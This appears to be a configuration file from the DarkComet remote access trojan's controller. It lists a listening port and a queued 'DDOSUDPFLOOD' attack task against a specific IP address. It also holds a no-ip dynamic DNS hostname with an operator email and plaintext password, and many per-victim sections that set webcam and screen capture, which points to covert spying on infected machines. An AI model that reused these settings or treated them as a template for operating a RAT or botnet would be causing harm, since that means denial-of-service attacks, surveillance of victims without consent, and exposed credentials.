[LSTSIN]
col0=25
col1=70
col2=78
col3=76
col4=76
col5=80
col6=110
col7=22
col8=22
col9=50
col10=50
col11=76
col12=60
col13=100
col14=0
col15=0
col16=60
[SIN]
MAXIMIZED=0
Ports=1604:YES|1
REFRESHSINRATIO=25
Tasks=0+Attack Imperial+DDOSUDPFLOOD+68.194.136.134|0�1
disclamer=0
help=0
USERSTHUMB=0
AUTOREFRESHSIN=0
[SINPOS]
width=997
height=310
top=380
left=337
[PUSHME]
sig=From DarkComet
api=http://pushme.to/q/widget/export/?hash=yourhash
spin=10
active=0
c1=0
c2=0
c3=0
c4=0
[NOIP]
HOST=4b1d0.no-ip.org
USER=swaqqer1337@hotmail.com
PASS=AsDfGhJkL123
AUTO=1
HIDE=1
AUTOUPDATE=1
[{846ee340-7039-11de-9d20-806e6f6e6963-784347142}]
CAMFREQ=10
CAMQUALITY=67
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=1
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-2360987560}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-12100461}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=90
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-3994120758}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-3806689871}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{d8932e40-6a6f-11db-b6ab-806e6f6e6963-1651828756}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{d8932e40-6a6f-11db-b6ab-806e6f6e6963-3693704081}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-3326357182}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{3a539840-6a70-11db-887c-806e6f6e6963-350689138}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-4139990026}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-2092900584}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[SYSTEM]
SKNMN=0
SKIN=1
SKNFN=ClearLooks-BLUE.skn
DISSKNM=0
[{846ee340-7039-11de-9d20-806e6f6e6963-1746762151}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{793ccac0-5604-11e0-b6db-806d6172696f-1544834541}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-1051285384}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-3494155887}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=90
SC2ISIZE=1
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-351355253}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=87
SC2ISIZE=1
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-3090999839}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{0d9c1b40-5f7d-11e0-95a4-806d6172696f-2819505531}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[NOTIFY]
SND=0
BALOON=0
TOAST=1
[{846ee340-7039-11de-9d20-806e6f6e6963-1550589366}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-1215780667}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{e29ac6c0-7037-11de-816d-806e6f6e6963-2822642913}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-752435339}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-3132338476}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-3057167188}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{3a539840-6a70-11db-887c-806e6f6e6963-471271105}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=67
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=0
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-3902936808}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-2285784533}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=67
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-2700388327}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=65
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-2631337539}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=67
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-302166626}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-76739716}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-1682566730}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-1824051206}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-213613465}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-2428641296}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
